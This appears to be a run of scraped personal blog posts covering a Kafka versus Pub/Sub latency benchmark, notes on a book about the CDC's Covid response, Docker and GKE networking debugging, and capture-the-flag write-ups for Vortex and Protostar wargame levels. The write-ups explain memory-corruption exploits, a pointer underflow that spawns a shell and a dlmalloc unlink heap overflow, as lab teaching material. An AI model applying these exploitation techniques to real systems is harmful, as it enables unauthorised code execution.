The team’s production setup is like this.
I defined latency as the time elapsed from when a message is published and when it’s received by a subscriber. I didn’t count the extra time it takes for a subscriber to acknowledge the message. I used Golang and the same upstream libraries for Kafka and Pub/Sub that they used or would use, respectively, in production. I published messages of various sizes at various rates from AWS EC2 instances in Oregon for five minutes. At the same time, five Google Compute Engine instances in us-central1 subscribed to these messages (pull-based) as fast as possible with an initial burn-in period of one minute. I didn’t measure the latency until the burn-in period elapsed to avoid any effects on latency that may arise from using a new topic or subscription or not enough messages flowing through the messaging service. This ensured I more closely mimicked message latency in production. I always took the percentile summary of the subscriber with the second highest p99 latency. I created new Pub/Sub or Kafka topics for each series in the graphs below. Kafka topics always had eight partitions.
I took some inspiration from a blog post titled “Benchmarking Message Queue Latency” and also found the following GCP post “Testing Cloud Pub/Sub clients to maximize streaming performance.” The latter linked to the code used to benchmark Pub/Sub. Unfortunately, after trying that tool many times and finding it wasn’t documented well or had various issues like this, I gave up and wrote my own simple latency benchmarker in Golang. This was probably better anyways to ensure I was using the same language and client libraries as the team I was helping.
My full results are in this Google sheet. The benchmarking code is at github.com/davidxia/cloud-message-latency.
With my specific test parameters, Kafka p99 latencies are 100-200ms and much lower than Pub/Sub latencies. In the worst case scenarios, Pub/Sub latencies were almost an order of magnitude higher. Pub/Sub p99 latencies were approximately 0.5-1 seconds at the team’s current publisher throughput which is relatively low at about 1KB/s. At higher throughputs the latencies dropped to 300-400ms. This conforms to Google’s documentation and generally accepted knowledge that Pub/Sub performs faster at higher message volumes. According to one of that team’s engineers, this latency is acceptable for all messages except for one which can be changed to a direct service-to-service request.
It was also interesting to see that message delivery was pretty evenly spread out over five subscribers with Pub/Sub. Kafka often had a few consumers that received twice as many messages as their peers.
After I finished benchmarking, I found PerfKitBenchmarker, an open source benchmarking tool used to measure and compare cloud offerings. It looks promising, but I haven’t tried it out yet.
]]>The U.S. Centers for Disease Control (CDC) is portrayed as a risk-averse bureaucracy that wants to study disease and not take strong measures to control disease. Sometimes this interest conflicts with local health officials who want to save lives and see strong measures as necessary even if not all the evidence is available yet. Health officials are always firefighting and can’t wait for more data. Lewis compared them to platoon leaders during battle. (page 40)
Deadly mistakes are often result from the combination of systemic and human failures. Lewis tells the story of a Veterans Affairs (VA) patient who was accidentally boiled alive in an Atlanta VA hospital. The hospital heated water to a specific temperature hot enough to kill certain bacteria but not hot enough to scald people. Bathtub faucets had a special valve that prevented water that was too hot from emerging. The water heating mechanism was broken, however. So the nurses compensated by adjusting the valve to a hotter temperature. Then one day, plumbers fixed the heating mechanism without telling the nurses. Normally a patient would tell the nurses when the water was too hot. But the nurses happened to be bathing one patient who was an older man with mental health problems. He always screamed no matter what. The nurses didn’t think anything was wrong when he screamed this time. “An hour later, the man’s skin was peeling away, and he was dying of thermal burns.” (67) This is a powerful story. Unfortunately, I’m unable to find corroborating news articles, and Lewis doesn’t have references or footnotes.
Why and how people learn.
…people don’t learn what is imposed upon them but rather what they frely seek, out of desire or
need. For people to learn, they need to want to learn… “People in an organization learn,” said
Carter. “They’re learning all kinds of things. But they aren’t learning what you are teaching them.
You go to a formal meeting. The important conversation is not in the meeting. It’s in the halls
during the breaks. And usually what’s important is taboo. And you can’t say it in the formal
meeting.”
Is Lewis’ account of the CDC’s aversion to computer models accurate? Premonition says the CDC had models that were just in people’s heads. “They, too, used models. They, too, depended on abstractions to inform their judgments. Those abstractions just happened to be inside their heads.” (85)
One of the two main protagonists of the book is an American physician named Carter Mecher. From 1996 to 2005, Mecher served as the Chief Medical Officer for the Southeast Veterans Administration Network. Mecher wanted to figure out how government should allocate resources.
Each year, Congress would hand more than a hundred billion dollars to Veterans Affairs, and various
people inside the VA would bay for more than they’d gotten the year before. The top brass had no way
to figure out who was actually busting their ass and needed more help and who was loafing…He hated
in particular the way some people were able to use their own inefficiency to create a seeming need
for more funding; and other people, people with a gift for making do with less, were, as a result,
given even less. “It drove out the entrepreneurial spirit,” said Carter.
ICE under the Trump administration was bussing and flying undocumented immigrants into cities in California to manufacture a humanitarian crisis according to the other protagonist of the book, a public health official named Charity Dean. (187, 190) This seemed insane to me, but I was able to find news articles about this. The actual story seems a bit more nuanced as one can read from this AP article “Far from border, US cities feel effect of migrant releases.”
Charity Dean explained to the CDC at the beginning of 2020 that there is no “system of public health in the United States, just a patchwork of state and local health officers, beholden to a greater or lesser degree to local elected officials. Three thousand five hundred separate entities that had been starved of resources for the past forty years.” This explains why the U.S. had no coordinated and science-based approach to Covid. (205-6)
A major antagonist of the book is Sonia Angell. She was the director of California’s Public Health Department and supervisor to Charity Dean who was the deputy director at the time. Lewis describes how she actively prevented any measures to acknowledge the severity of the virus or to try to contain it. Did Lewis try to interview and incorporate Sonia Angell’s side of the story?
A particularly egregious story of CDC incompetence is when they didn’t bother recording the addresses of Americans returning from China.
When local health officers called the CDC to say how hard it was to track down John Smith when the
CDC had listed his residence as “Los Angeles International Airport,” the CDC said, “Just don’t
follow up on them.” What was the point of having these travel restrictions from Wuhan if the federal
government was going to just let people loose upon their return?
There’s a particularly enraging and scary part of the book on CDC inaction. Mecher learns about Covid transmission, hospitalization, and death reates among passengers on the Diamond Princess cruise ship. This is a perfect and scary real life simulation of how Covid will behave in the general population. Mecher compares the situation of the world at the time to the Mann Gulch fire. This was a wildfire that initially looked containable. 13 smokejumpers parachuted in to fight it. But then “unexpected high winds caused the fire to suddenly expand, cutting off the men’s route and forcing them back uphill. During the next few minutes, a “blow-up” of the fire covered 3,000 acres (1,200 ha) in ten minutes, claiming the lives of 13 firefighters, including 12 of the smokejumpers. Only three of the smokejumpers survived.“ Mecher tries desparately to convince the CDC to take strong enough actions.
“I sense confusion among very smart people,” he wrote in early March. “[They] hear that more than
80% of those who are infected have mild disease and that overall case fatality rates are on the
order of .5%. And then they equate these states to a mild outbreak.” … Using the most conservative
assumptions suggested by the cruise ship—an attack rate of 20 percent and a fatality rate of
half of 1 percent—you wound up with 330,000 dead Americans… “You have all been quiet for
most of the discussion over the past several weeks. I would urge you to read the article I just sent
out and upbrief your boss… History will long remember what we do and what we don’t do at this
critical moment. It is time to act and it is past the time to remain silent. This outbreak isn’t
going to magically disappear on its own.”
It’s obvious that people at the top of government agencies at all levels are lost. No one’s coming to save us. Here’s another enraging anecdote about Angell.
On March 6, Gavin Newsome convened a hundred of the state’s top officials to discuss the new
coronavirus. Sonia Angell had told Charity that she, Angell, would give the briefing to the
governor, and that it was better if Charity did not attend the meeting. *You have no role*, Angell
explained, *so you should not be there*. Charity didn’t believe Angell had the ability to get up in
front of the audience and explain what was going on. “I just had a feeling that something would
happen and she wouldn’t be able to make it,” she recalled. Sure enough, the morning of the event,
the phone call came. Angell couldn’t make the meeting. Might Charity step in at the last minute to
replace her?
Media changes now force technical people to consider the cynical perception of their actions instead of strictly whether their decision in and of itself is the best. (287)
Lewis introduces the interesting concept of L6.
In any large organization, the solution to any crisis was usually found not in the officially
important people at the top but in some obscure employee far down the organization’s chart. A case
in point was the day the software used by the State Department to process visa applications stopped
working. That day the U.S. government simply lost its ability to issue visas… “Six layers down
from the people in charge we found two contractors who actually understand what is broken.” The L6.
The private sector is inefficient at generating knowledge because profit motive prevents collaboration and openness. (246)
Another story about how the federal government’s laissez-faire attitude towards helping state and local governments secure personal protective equipment led to a market free-for-all that drove prices way up. (253)
Local health offices are understaffed and behind the times. Joseph DeRisi is an American biochemist who heads the Chan Zuckerberg Biohub, a nonprofit research organization. In April 2020, Biohub had developed a Covid test kit and offered it free to any local public health officials who needed it.
Once his team began to deliver free test kits to them, he understood why they’d been slow to take up
the Biohub’s offer of free testing. Many local health officers were so understaffed and
underequipped they had trouble using the test kits. Most were unable to receive the results
electronically; they needed the results faxed to them. Some had fax machines so old that they
couldn’t receive more than six pages at a time. A few didn’t even have functioning fax machines, and
so the Biohub got into the business of buying and delivering fax machines along with test kits.
This story is corroborated by this NYT article “Bottleneck for U.S. Coronavirus Response: The Fax Machine.”
One reason why the CDC is dysfunctional is because Reagan changed its director from being a civil servant to a presidential appointee. (289-90)
Local health officials who were courageous lost their jobs and feared for their safety because there was a lack of leadership from CDC and federal and state leaders. (291)
Do not use this post as any basis for consuming mushrooms yourself. Some mushrooms are extremely poisonous and can be fatal if ingested.
Here’s photos of what we found and my amateur guess at what they are.
We saw what I think is a Boletus pseudosensibilis, but my mom snatched it out of my hands and threw it away before I could take it home.
Monotropa uniflora isn’t a fungus but needs them. It has no chlorophyll and doesn’t depend on photosynthesis. It’s a saprophyte that gets nutrients by tapping into the resources of trees, indirectly through myccorhizal fungi.
]]>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
|
Fixed by setting the following (I use fish shell). I found the first four environment variables in this Github comment. The second two I knew to add because I was seeing errors about the compiler not being able to find the openssl.h and re.h header files.
1 2 3 4 5 6 |
|
A data infrastructure team at work provides a tool for starting a data pipeline job from a local
development environment. Let’s call this tool foo
. This tool depends on gcloud
and docker
.
It creates a user-defined Docker network, runs a utility container called bar
connected to that
network, and then runs another container called qux that talks to bar to retrieve Oauth tokens
from Google Cloud Platform (GCP).
Most developers run foo
on their local workstations, e.g. Macbooks. But I have the newer
Macbook with the Apple M1 ARM-based chip. Docker Desktop on Mac support for M1s was
relatively recent. I didn’t want deal with Docker weirdness. I also didn’t have a lot of free
disk space on my 256GB Macbook and thus didn’t feel like clogging up my drive with lots of Java,
Scala, and Docker gunk.
So I tried running foo
on a GCE VM configured by our Puppet configuration files. I ran foo
,
I got this error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
The HTTP connection timed out. First I checked whether the container started by foo
can make a TCP
connection to the bar container. I ran foo --verbose run -f data-info.yaml -w
DumpKubernetesContainerImagesJob -p 2021-04-26 -r my-project/target/image-name
again and did the following in another terminal window.
nsenter
is a cool tool that allows you to run programs in different Linux namespaces.
It’s very useful when you can’t get an executable shell into a container with commands like
docker exec -it ... bash
. This can happen when the container doesn’t even include any shells
and just has the binary executable for instance.
1 2 3 4 5 6 7 |
|
So the HTTP connection timeout was caused by an error lower down on the networking stack: an inability to establish a TCP connection. A TCP connection from the host to bar worked though.
1 2 |
|
When I see a networking issue like this, I know there might be some misconfigured firewall rule
blocking IP packets. I listed all the firewall rules. The ones in the filter table’s FORWARD
chain caught my attention.
1 2 3 4 5 6 7 8 9 10 11 |
|
I disabled the GCE VM’s cronned Puppet run and then ran sudo systemctl restart docker
. I ran
bar and a test nginx1 container connected to foo-network
.
1 2 3 4 5 6 7 8 9 10 |
|
Now a TCP connection from the nginx container to bar succeeded.
1 2 |
|
I checked iptables rules again and saw two additional rules (7 and 8) in the filter table’s
FORWARD
chain. Rule 8 allowed IP packets coming in from the br-8ce7e363e4f9
network interface
(in this case a Linux bridge) and leaving through the same interface.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
When I re-ran Puppet rules 7 and 8 were deleted and containers on the foo-network
were again
unable to establish a TCP connection. I added rule 8 manually and confirmed this is the rule
causing my error above.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now running foo
gave a different error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
The only background knowledge we need to know here is that the qux container is sending a Google
Service Account (GSA) JSON credential with "token_uri": "http://172.20.0.127:80/token"
. Bar
then uses that token for further GCP API requests. So bar needs to query DNS for
accounts.google.com. Bar container logs show that it cannot lookup the DNS A record for
accounts.google.com by querying 127.0.0.11:53
.
1 2 3 4 5 6 7 8 9 10 11 |
|
I wondered why bar was querying 127.0.0.11
for DNS. It turns out this is another loopback
address. In fact, all of 127.0.0.0/8
is loopback according to RFC-6890. I guess Docker
containers that are attached to user-defined Docker networks are configured by default to use
127.0.0.11
in their /etc/resolv.conf
.
1 2 3 4 5 6 7 8 9 10 |
|
Why were these Docker containers configured to query for DNS records on 127.0.0.11
? It turned
out after some Googling that
By default, a container inherits the DNS settings of the host, as defined in the /etc/resolv.conf configuration file. Containers that use the default bridge network get a copy of this file, whereas containers that use a custom network use Docker’s embedded DNS server, which forwards external DNS lookups to the DNS servers configured on the host.
— https://docs.docker.com/config/containers/container-networking/
Now I wondered if Docker’s embedded DNS server is actually running. After some more Googling, I
realized that each container also had its own set of firewall rules. So I listed bar’s nat
table’s DOCKER_OUTPUT
chain’s rules. These two rules showed that the destination port is
changed for TCP packets bound for 127.0.0.11:53 to 37619. UDP packets have their port changed to
58552.
1 2 3 4 5 6 |
|
Whatever’s listening on those ports was accepting TCP and UDP connections.
1 2 3 4 |
|
But there was no DNS reply from either.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Docker daemon was listening for DNS queries at that IP and port from within bar.
1 2 3 4 5 |
|
After enabling log-level": "debug"
in /etc/docker/daemon.json
and reloading the configuration
file, I saw that the daemon was trying to forward the DNS query to 10.99.0.1. This was the IP of
the corp0
bridge network interface which we create instead of the default docker0
bridge
network. I saw there was an IO timeout when the daemon was waiting for the DNS reply.
1 2 3 4 5 |
|
We set dockerd’s upstream DNS server as 10.99.0.1 because we have unbound running as a DNS proxy/cache on the host. We configured it to bind on the bridge interface so Docker containers can hit the host-local unbound instance by routing DNS requests to corp0.
So why can’t the daemon forward IP packets from 172.20.0.127:37928 to 10.99.0.1:53? It seemed like UDP packets sent from bar were able to reach 10.99.0.1:53, but DNS requests failed. I also knew DNS requests from the host to 10.99.0.1:53 worked.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
|
My hypothesis at this point was that Docker’s embedded DNS server wasn’t working in some way. After exploring this for a while with no luck, I questioned my assumption that UDP packets from 172.20.0.127:37928 were able to reach 10.99.0.1:53. I realized TCP packets from 172.20.0.127:37928 were not able to reach 10.99.0.1:53.
1 2 |
|
So why were UDP packets able to? Isn’t UDP a fire-and-forget protocol? How can nc
even tell if
an IP and port is listening for UDP packets at all? It was good that I backtracked and questioned
my assumption because it turns out that one cannot distinguish between an open UDP port and
dropped packets en route to that port.
So it must be another networking issue which means there must be another firewall rule that’s
blocking packets from the bar container to 10.99.0.1. After a while of looking, I realized the
filter table’s INPUT
chain’s default policy was DROP
and that there was no rule that matched
packets coming in from the br-8ce7e363e4f9
interface.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
So I added a matching rule that accepted those packets manually.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
I retried querying for accounts.google.com, and I got a DNS reply!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
But… there’s no A records? Docker daemon logs stated that the upstream local unbound DNS server did not return any A records.
1 2 3 |
|
Hm, I noticed the status in the empty DNS reply is REFUSED
. I recalled that unbound supports
configuring which DNS queries it will reply to based on originating interface and
IP.
1 2 3 4 |
|
Bingo! There’s no access-control
entry that allowed DNS queries from 172.20.0.127. I added
access-control: 172.16.0.0/12 allow
(since all of 172.16.0.0/12 is private IPv4 address space
according to RFC-1918) and reloaded unbound. Now it worked!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
Docker daemon logs showed the following.
1 2 3 |
|
Here are the general debugging strategies I used and reinforced for myself.
gcloud
was failing. I translated that into an nc
command
that simulated the establishment of the TCP connection between containers. Or a DNS query from
bar was failing. I translated that into a dig
command. And in all these cases, the origin of
these IP packets mattered. So knowing how to use nsenter
to enter a network namespace and create
IP packets that originate from the same container was useful. nsenter
is essential when debugging
containers that don’t have any tools installed in them. The bar image only contains one
go-compiled executable. There’s no other tools I can use in there.Error #1: I created a patch that makes our Puppet installation ignore rules created by Docker networks in the filter table’s FORWARD chain.
Error #2: Unfortunately, I don’t think there’s a good solution to this other than disabling our
GCE VM’s periodic Puppet runs and manually adding a rule to allow packets from the new interface.
The chain’s default policy is DROP
, and interface names are dynamic.
Error #3: I made a patch that makes unbound reply to DNS queries with source IPs of in the range
172.16.0.0/12
.
The large K8s cluster is actually a Google Kubernetes Engine (GKE) cluster with master version 1.17.14-gke.400 and node version 1.17.13-gke.2600. This is a multi-tenant cluster with hundreds of nodes. Each node runs dozens of user workloads. Some users said DNS resolution within their Pods on certain nodes weren’t working. I was able to reproduce this behavior with the following steps.
Kubernetes schedules kube-dns
Pods and a Service on the cluster that provide DNS and configures
kubelets to tell individual containers to use the DNS Service’s IP to resolve DNS names. See K8s
docs here. First I get the kube-dns
‘ Service’s Cluster IP. This is the IP address to
which DNS queries from Pods are sent.
1 2 3 |
|
Then I make DNS queries against the Cluster IP from a Pod running on a broken node.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
|
I cordoned and drained the node and added the annotation
cluster-autoscaler.kubernetes.io/scale-down-disabled=true
to prevent the cluster autoscaler from
deleting it.
Then I performed a more basic test. I tested whether I could even make a TCP connection to the Cluster IP on port 53 (default DNS port).
1 2 3 4 |
|
A quarter of the TCP connections fail. This means the error is below the DNS layer at TCP layer 3.
Some background for those unfamiliar. K8s nodes (via the kube-proxy
DaemonSet) will route IP
packets originating from a Pod with a destination of a K8s Service’s Cluster IP to a backing Pod IP
in one of three proxy modes: user space, iptables, and IPVS. I’m assuming GKE
runs kube-proxy
in iptables proxy mode since iptables instead of IPVS is mentioned in their docs
here.
kube-proxy
should keep the node’s iptable rules up to date with the actual kube-dns
Service’s endpoints. The following console output shows how I figured out the IP packet flow by
tracing matching iptables rules.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
|
These final rules are the ones that actually replace the destination Cluster IP of 10.178.64.10 with
a randomly chosen kube-dns
Pod IP. The random selection is implemented by the rules in the
KUBE-SVC-ERIFXISQEP7F7OF4
chain which have statistic mode random probability p
. Rules are
matched top down. So the first rule with target KUBE-SEP-BMNCBK7ROA3MA6UU
has a probability of
0.01538461540 of being picked. The second rule with target KUBE-SEP-GYUBQUCI6VR6AER2
has a
probability of 0.01562500000 of being picked. But this 0.01562500000 is applied to the probability
that the first rule didn’t match. So its overall probability is (1 - 0.01538461540) * 0.01562500000
~= 0.01538461540. Applying this calculation to the other rules, you can see each rule has a
probability of 0.01538461540 or 1/n
in being selected where n
= 65 is the total number of kube-dns
Pods in this case. This algorithm is actually a variation of reservoir sampling.
At this point I strongly suspected the iptables rules were stale and routing packets to kube-dns
Pod IPs that no longer exist. In order to confirm this I wanted to find an actual DNAT’ed IP that
didn’t correspond to any actual kube-dns Pod. There were 65 rules in the KUBE-SVC-ERIFXISQEP7F7OF4
chain, but I expected 77 because that was the number of kube-dns
Pods.
1 2 |
|
On nodes without DNS issues, I saw the correct number of rules.
1 2 |
|
I saw this Pod IP when inspecting a randomly chosen rule on my-gke-node
.
1 2 3 4 5 |
|
No kube-dns
Pod existed with this IP.
1 2 |
|
This confirmed kube-proxy
wasn’t updating the iptables rules for kube-dns
. Why? The kube-proxy
logs on the node showed these ongoing occurring errors.
1 2 3 4 |
|
I think these kube-proxy
errors are caused by this underlying K8s bug, but I’m not sure.
we found that after the problem occurred all subsequent requests were still send on the same connection. It seems that although the client will resend the request to apiserver, but the underlay http2 library still maintains the old connection so all subsequent requests are still send on this connection and received the same error use of closed connection.
So the question is why http2 still maintains an already closed connection? Maybe the connection it maintained is indeed alive but some intermediate connections are closed unexpectedly?
— https://github.com/kubernetes/kubernetes/issues/87615#issuecomment-596312532
The bug in that issue is fixed in K8s 1.19 and 1.20.
If you’re using GKE and Google Cloud Monitoring, this log query will show which nodes’ kube-proxy Pods can’t get updated Service and Endpoint data from the K8s API.
1 2 3 4 5 |
|
Hint 1: how much data
Connect to the host and port and read all the bytes you can. How many bytes do you get?
Hint 2: endianess
“…read in 4 unsigned integers in host byte order” means the bytes are
already in host byte order or little-endian. If your system is also
little-endian, you don’t need to do anything special when interpreting the
bytes.
Hint 3: expected reply
How many bytes is each integer? What is the sum of all four?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
This solution assumes we have solved the previous level and can SSH into the machine as user vortex1. Caveat: the machine is extremely slow.
First let’s find out some information about the machine.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
It’s a machine running Ubuntu 14.04.
1 2 |
|
It’s a 64-bit system.
1 2 |
|
ASLR is disabled.
Hint 1: password location for next level
The instructions don’t tell you this, but the password for the next level is
located in the directory /etc/vortex_pass
.
Hint 2: required permissions
What are the permissions of the password file for the next level? How can you
read this file?
Hint 3: program source code
What does the program do? Can you see the code path you need to execute to
elevate your privileges?
Hint 4: how to change
How can you change the value of ptr
ptr
to the right value? You shouldn’t need
to send more than ~300 bytes to the program to do so.
Let’s disassemble the executable to gain some insight into the stack layout.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
|
At main+8
, the stack pointer esp
is decreased by 0x220 to make room for unsigned
char buf[512]
, unsigned char *ptr
, and unsigned int x
. If we look more closely at the assembly,
we can see ptr
is located at esp + 0x14
because the instruction before that increases eax
by
0x100
or (sizeof(buf) / 2)
or 256. main+211
shows x
is located right after ptr
at esp +
0x18
since the instruction right before calls getchar()
. This means buf[512]
is after that and
takes up the majority of the stack. So the stack layout is ptr
, x
, then buf[512]
. This makes
sense because the compiler on more modern systems will put buffers after other variables to protect
against buffer overflows.
Question: why is the size of ptr
only 4 bytes? I thought on 64-bit systems pointer variables are 8
bytes not 4 since memory should be 64-bit- or 8-byte-addressable?
We set a breakpoint at the getchar()
call and run the program. Examine the first 64 words of esp
in hexadecimal.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
ptr
is located at $esp + 0x14 = 0xffffd4d4
which is initialized with a value of 0xffffd5dc
.
Since ASLR is disabled, this location is fixed.
I first thought of a brute-force strategy of decrementing ptr
’s value with \
until its highest
byte was 0xca
. That way, when it’s bit-wise ANDed with 0xff000000
, the result would be
0xca000000
. The exploit would be the following.
1 2 3 4 5 6 7 8 |
|
Aside: the Python command is run in a subshell with an extra cat
to keep the /bin/sh
listening
to more input from the stdout of that subshell. That way we can add more commands from the
terminal. The Python command triggers the /bin/sh
. The cat
with no args just reads from the
current stdin and feeds data to /bin/sh
. See this Stack Exchange answer.
This is definitely not the best solution because 0xffffd5dc - 0xcaffffff = 0x34ffd5dd = 889,181,661. If written to disk, this file would be almost a gigabyte.
Let’s think of a better solution. There’s no lower bound checking on ptr
’s value. So we can
decrement the value of ptr
until it references its own memory address which starts at 0xffffd4d4
.
Then we write 0xca
into the highest byte at 0xffffd4d7
. ptr
’s value is initialized to
0xffffd5dc
. So we write this many \
: 0xffffd5dc - 0xffffd4d7 = 0x105 = 261. Instead of the
seemingly arbitrary 261, we’ll use 512/2 + 5. This is more descriptive because it shows we’re moving
the ptr
reference from where it starts in the middle of buf[512]
back to the beginning and then
past the x
and one byte into itself.
1 2 3 4 5 |
|
Now that we have a shell as vortex2, we can read the password to advance to the next level.
1 2 3 4 5 6 7 |
|
Hint 1: number of args
You don’t need to use all the available argv
slots used in the executable.
Hint 2:
What is $$
$$
? What is its value in the context of the executable?
Hint 3: file to tar
What file do you need to read? How can you use the program to read it?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
The level’s description is
Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2
This is the source code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 |
|
The first line of the description coupled with the fact the code listens on port 2993 means we’ll
have to send a TCP packet that exploits a heap related vulnerability. main()
is pretty simple. It
runs the final2 binary in the background as root and processes requests with get_requests()
.
get_requests()
declares an array of 256 char pointers and reads input strings into it. If any
request size isn’t REQSZ
or 128 bytes, the function breaks out of the while(1)
loop. Any request
payload that doesn’t start with FSRD
also breaks out of the loop. The check_path()
function is
then called and dll
is incremented. A for-loop writes “Process OK” to stdout and frees each string
buffer starting with the oldest.
check_path()
stores a pointer to buf
’s right-most /
in p
. l
is the length of the string
starting from p
. If p
is greater than 0, start
points to the part of buf
that has "ROOT"
.
If "ROOT"
is a substring in buf
, the while loop decrements start
until it finds a /
. Then
memmove()
moves l
bytes of the string starting at p
to start
.
A TCP packet with the string FSRD/ROOT/AAAA
will cause p
to point to the second /
. So p
as a
string is /AAAA
. l
is 5. start
initially points to the R
in ROOT
and later is decremented
to point to the first /
. memmove()
changes the string to FSRD/AAAA/AAAA
.
Notice that start--
doesn’t check the bounds of the string passed in by buf
. It will keep
scanning leftward until it finds some /
. So memmove()
can write to memory outside of the current
string.
We know we’ll need to exploit the free()
call which in this series of exercises uses the
vulnerable dlmalloc unlink()
macro. In a previous post, I showed how this exploit
manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request
payloads. Our request payloads also need to corrupt heap memory in a way that will trick dlmalloc
into redirecting code to the shellcode.
memmove()
Let’s craft a first payload that will allow the second payload to overwrite heap memory before the
start of the second string. FSRDAAAA...AAAA/AAAA
should work. The second payload can be
FSRDROOTAAA...AAAA/BBBB
. After the second call to check_path()
, the heap memory of the first
string should be FSRDAAAA...AAAA/BBBB
. Let’s confirm this with a Python script and gdb
. We’ll
set a breakpoint right after the call to check_path()
and send these two strings.
We save the following contents to a file named test.py
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
I’m running the Protostar VM on Virtualbox on a Macbook. Set the network settings for the VM to
Host-only Adapter. Once the VM starts, use the Virtualbox “Show” button to get a terminal to the VM.
Login as user
with password user
. Run ip addr show
to find the VM’s local IP address. Mine is
192.168.99.107
. I then close the Virtualbox terminal because I like to use iTerm. I SSH with iTerm
into the VM as root with password godmode
. We need to be root in order to attach gdb to a running
process.
1
|
|
You can see final2 is already running. We get the PID.
1 2 |
|
Now attach gdb to it. Since the program forks a new child process to handle requests, we set follow-fork-mode child
to make gdb follow the child process instead of the parent. set detach-on-fork off
makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
Disassemble get_requests()
to find where check_path()
returns.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now run our Python script in another terminal to send the strings.
1
|
|
Our gdb terminal will show the following.
1 2 3 4 5 6 7 8 |
|
Print buf
to show the address it points to. Then examine the first 40 DWORDs in hexadecimal
starting at address 0x804e000
(0x804e008 - 0x8
so we can see the first heap chunk’s metadata in
the previous 8 bytes). We can see its FSRD
(0x44525346
) followed by lots of A
s (0x41
s) and
ends in /AAAA
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
We continue and examine the memory of the first chunk again. We expect the memory at address
0x804e084
to be BBBB
or 0x42424242
which it is.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
free()
With the ability to overwrite bytes following a strategically placed /
character in the previous
heap chunk, we can perform a classic heap overflow exploit using the unlink()
technique. We can’t
overwrite the first chunk’s heap metadata because there’s no way to insert a /
before it. So we
target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm
explained in my previous post because it can be a little confusing.
When the first chunk is freed, unlink()
will run on the second chunk if the second chunk has
already been freed. dlmalloc determines if the second chunk is freed by checking the third chunk’s
PREV_INUSE
bit which is the lowest bit of the second byte of the chunk. In order to find the start
of the third chunk, dlmalloc adds the value of the chunk’s second DWORD bitmasked with 0x1 (i.e.
ignoring the lowest bit) to the chunk’s starting address. So in the above memory dump, the
start of the second chunk is 0x00000089 &0x1 + 0x804e000 = 0x804e088
. Likewise, the start of the
third chunk is 0x00000089 &0x1 + 0x804e088 = 0x804e110
. So we have to figure out a way to write
arbitrary bytes to the third chunk.
But we’re already writing arbitrary bytes to the second chunk’s metadata. Is there way to make
dlmalloc think the third chunk starts somewhere in memory where we’re already writing bytes for the
second chunk? Nothing in dlmalloc checks the third chunk is actually right after the second.
dlmalloc just blindly performs an addition on two numbers. One of these numbers is the second
chunk’s size which we can set via the memmove()
bug. Let’s make dlmalloc think the third chunk is
actually four bytes before the start of the second chunk. The second chunk is at 0x804e088
so the
“virtual” third chunk will be at 0x804e084
. What number added to 0x804e088
equals 0x804e084
?
-4. [Integer overflow] means adding 0xfffffffc
is the same as adding -4 (0x804e088 + 0xfffffffc =
0x804e084
). So the second chunk’s second DWORD representing its size must be 0xfffffffc
, and the
PREV_INUSE
